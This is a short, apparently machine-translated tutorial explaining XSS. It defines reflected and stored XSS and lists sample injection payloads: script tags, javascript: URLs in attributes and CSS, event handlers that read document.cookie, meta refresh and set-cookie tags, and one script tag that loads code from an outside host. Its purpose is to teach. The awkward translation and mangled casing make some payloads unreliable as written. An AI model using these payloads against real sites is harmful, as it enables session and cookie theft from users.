Easy to understand XSS

What is XSS?

XSS (Cross site Scripting), which is an inter-site scripting attack, is a common computer security vulnerability in Web application. XSS executes user-injected scripts by injecting a malicious, executable script on the client side that does not process the user input and outputs the user input directly to the browser.

Classification of XSS

Depending on the impact of XSS, you can divide XSS into non-persistent and persistent types.

1.              non-persistent, also known as reflection-type XSS. Enter data to the server side through the Get and post methods. The data entered by the user is usually placed in the query string of the URL, or in the form data. If the server side of the input data is not filtered, verified or encoded, directly to the user input information directly to the customer, it may cause reflection type XSS. Reflective XSS is a more prevalent form of XSS, and its degree of harm is generally considered small. However, the consequences of some reflective XSS can be serious, such as entering the name of the input box <meta http-equiv= "Refresh" content= "5"
/>, the server is not processed, the value of name is sent directly to the browser, The browser will automatically refresh every 5 seconds. A serious person can cause the server to crash.

2. Persistent type, also known as storage-type XSS. This is usually because the server side stores malicious scripts entered by the user without validating them directly in the database, and renders the data on the browser each time it is called by the database. The XSS cross-site scripting attack will persist. If another user accesses the page, the malicious script is triggered to steal private information from other users.

Common XSS methods are divided into the following types:

1. Enter the malicious script directly in the input box, such as:

><script>alert (Document.cookie) </script>

2. Enter the HTML tag in the input box and embed the malicious script in the tag, such as Src,href,css style.

;

<body background= "Javascript:alert (' XSS ')" >

<style>li {List-style-image:url ("Javascript:alert (' XSS ')");} </STYLE><UL><LI>XSS</br>

3. Inject malicious scripts into event events, such as Onclick,onblur,onmouseover.

<a onmouseover= "alert (document.cookie)" >xxslink</a>

4. In the remote style sheet,javascript, such as

<link rel= "stylesheet" href= "Javascript:alert (' XSS ');" >

<script/src= "Http://ha.ckers.org/xss.js" ></SCRIPT>

5. META tags, such as

<meta http-equiv= "Refresh" content= "5"/>

<meta http-equiv= "Set-cookie" content= "Userid=<script>alert (' XSS ') </SCRIPT>" >

Easy to understand XSS